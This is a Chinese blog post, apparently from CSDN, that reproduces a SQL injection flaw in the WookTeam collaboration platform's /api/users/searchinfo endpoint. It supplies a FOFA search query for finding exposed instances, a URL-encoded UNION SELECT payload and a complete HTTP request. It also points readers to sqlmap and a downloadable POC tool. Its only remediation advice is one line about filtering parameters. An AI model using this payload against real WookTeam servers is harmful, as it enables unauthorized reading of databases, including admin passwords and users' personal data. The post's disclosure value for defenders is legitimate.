wookteam协作平台api/users/searchinfo接口存在SQL注入漏洞 附POC

于 2024-08-15 17:48:53 发布
阅读量271 收藏 4
点赞数 12
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/141228202
版权

@[toc]

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. wookteam协作平台简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

wookteam协作平台

2.漏洞描述

wookteam项目基于PHP语言开发,项目搭建需要PHP相关环境,涉及中间件技术以及Nginx和MySQL。该项目很容易在Docker环境中部署。下载源码后,使用./cmdinstall命令一键构建项目。Wookteam是一个支持在线协作管理和沟通的开源平台。它提供在线流程图、思维导图构建以及项目管理的可视化展示和分析,让项目团队成员直观地看到项目的进展情况和相关问题。数据信息。项目中还有一个在线知识库,可以存储开发中的迭代文档。此外,还有即时聊天工具,方便项目团队成员之间的沟通。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

wookteam协作平台

4.fofa查询语句

title="Wookteam"

5.漏洞复现

漏洞链接:http://xx.xx.xx.xx/api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23

漏洞数据包,执行md(1)函数:

GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

执行user()函数 图11 可以跑sqlmap

6.POC&EXP

POC工具下载地址:夸克网盘分享

7.整改意见

过滤参数

8.往期回顾

sublime88
关注
  • 12
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WookTeam searchinfo SQL注入漏洞复现
0xSec
08-13 290
WookTeam /api/users/searchinfo接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
英文维基百科Python查询API
huludan的专栏
08-08 1180
问题描述 维基百科语料库是做文本挖掘和自然语言处理相关实验的一个非常重要的公开可获取大规模语料库(知识库),有时需要对其进行检索并对获取结果页面的相关信息,如正文文本、标题、页面文本长度等。一种常见的做法是把维基百科语料的dump下载到本机使用,但是这种做法对本机的性能(内存、硬盘)等有一定要求,并且要自己进行众多繁琐的预处理,如果要进行检索,则还需要在本地实现检索功能,显然需要的预处理工作量有点大。如果我们不是使用大规模维基百科语料进行模型训练(如预训练模型),那么可以参考维基百科提供的API接口快速调用
WookTeam searchinfo SQL注入漏洞
最新发布
weixin_43167326的博客
08-14 510
WookTeam /api/users/searchinfo 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)
m0_46699477的博客
07-11 905
历年HW已公开漏洞专集!(目前漏洞库更新至84个,Goby持续更新...)。 截至2024年7月11日,Goby红队版已扩充以下历年HW已公开POC漏洞库,本次更新**84**个
HW漏洞威胁情报第十九天|HW情报
weixin_43167326的博客
08-14 627
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
weixin_34381687的博客
03-21 468
漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模...
QT学习笔记02_网易云api
AnrolaDimon的博客
01-20 856
搜索:csrf_token=hlpretag=&hlposttag=&s=(输入音乐名称)&type=1&offset=0&total=true&limit=20limit:返回数据条数(每页获取的数量),默认为20,可以自行更改offset:偏移量(翻页),offset需要是limit的倍数type:搜索的类型type=1 单曲type=10 专辑type=100 歌手type=1000 歌单。
QT音乐播放器(接入网易云API
m0_56921470的博客
10-08 4860
QT在线音乐播放器(接入网易云API
sqlserver查询补全时间_Sqlserver查询性能分析
weixin_32302013的博客
01-14 133
查询性能分析(执行结果分析)1、方法在查询窗口中输入以下命令dbccdropcleanbuffers--注释:清除数据dbccfreeproccache--注释:清除缓存这是为了每次查询时,不会因为重复查询对结果有干扰,接着在窗口中输入以下命令。Setstatisticsioon--注释:开启系统资源使用统计Setstatisticstimeon--注释:开启执行时间统计然后在窗口中...
vue等两个接口都返回结果再执行下一步的实例
10-14
const response = await axiosPost('/api/uum/org/orglist', { accessToken: localStorage.token, option: true }) this.options_grade = [] if (response.data.data.length > 1) { this.options_grade....
SQLServer数据库实用语法
12-17
### SQL Server 数据库实用语法详解 #### 一、存储过程创建与使用 在 SQL Server 数据库管理系统中,存储过程是一种预编译的 SQL 代码集合,它可以被当作一个单独的对象来调用,从而提高应用程序的执行效率并简化...
DotNet公用类(超多文档)
05-07
6.查询信息实体类(SearchInfo.cs) 7.类型(例如:int,string,double)转换(SmartDataReader.cs) 8.Sql命令操作函数(可用于安装程序的时候数据库脚本执行)(SqlScriptHelper.cs) ----------Device--------------...
C# 公共类文档包含Sql、Excel、Xml、GDI、窗体冻结解冻、图片水印压缩编码、正则表达式、反射操作等,各辅助类封装完美
12-03
查询信息实体类(SearchInfo.cs)7.类型(例如:int,string,double)转换(SmartDataReader.cs)8.Sql命令操作函数(可用于安装程序的时候数据库脚本执行)(SqlScriptHelper.cs)----------Device--------------1....
infosearch:在这个项目中,我将使用elasticsearch解析RSS新闻
05-15
Java API for Elasticsearch(通常称为JEST)是一个轻量级的客户端库,允许开发者用Java直接访问Elasticsearch的RESTful接口。通过JEST,我们可以轻松地执行索引、搜索、更新和删除等操作。 为了解析RSS新闻,...
Sql与Rce注入相关漏洞复现
山月不问人间事
08-12 725
‌这些查询可以是SELECT、‌INSERT、‌UPDATE或DELETE等,‌它们将在数据库中按顺序处理,‌尽管它们是在单个函数调用中发送的。假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。可在$_SERVER['REQUEST_URI']中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$_REQUEST['i_d']却是1。参数是可选的,‌用于限制分割后的数组元素数量。
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 142
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 504
kubernetes集群部署sql server数据库服务
SQL Server 事务
a876106354的博客
08-09 548
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
使用 sql server创建视图SearchInfo查询借阅记录中的借阅编号、读者证件号、图书编号、书名、作者、出版社、借阅时间、应还时间、操作员, 保存为一个CreateView.sql文件;
05-12
你可以按照以下步骤创建视图SearchInfo: 1. 打开 SQL Server Management Studio,连接到你所需要的数据库。 2. 在查询窗口中输入以下 SQL 语句: ``` CREATE VIEW SearchInfo AS SELECT br.BorrowID, r.ReaderID, b.BookID, b.BookName, b.Author, b.Publisher, br.BorrowTime, br.DueTime, br.Operator FROM BorrowRecords br JOIN Books b ON br.BookID = b.BookID JOIN Readers r ON br.ReaderID = r.ReaderID; ``` 以上语句中,我们使用了 JOIN 操作符将 BorrowRecords、Books 和 Readers 三个表连接起来,从而获取借阅记录中的相关信息。 3. 将以上 SQL 语句保存为一个名为 CreateView.sql 的文件。 4. 在查询窗口中执行 CreateView.sql 文件,即可创建名为 SearchInfo 的视图。 你现在可以使用以下 SQL 语句查询 SearchInfo 视图中的数据: ``` SELECT * FROM SearchInfo; ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值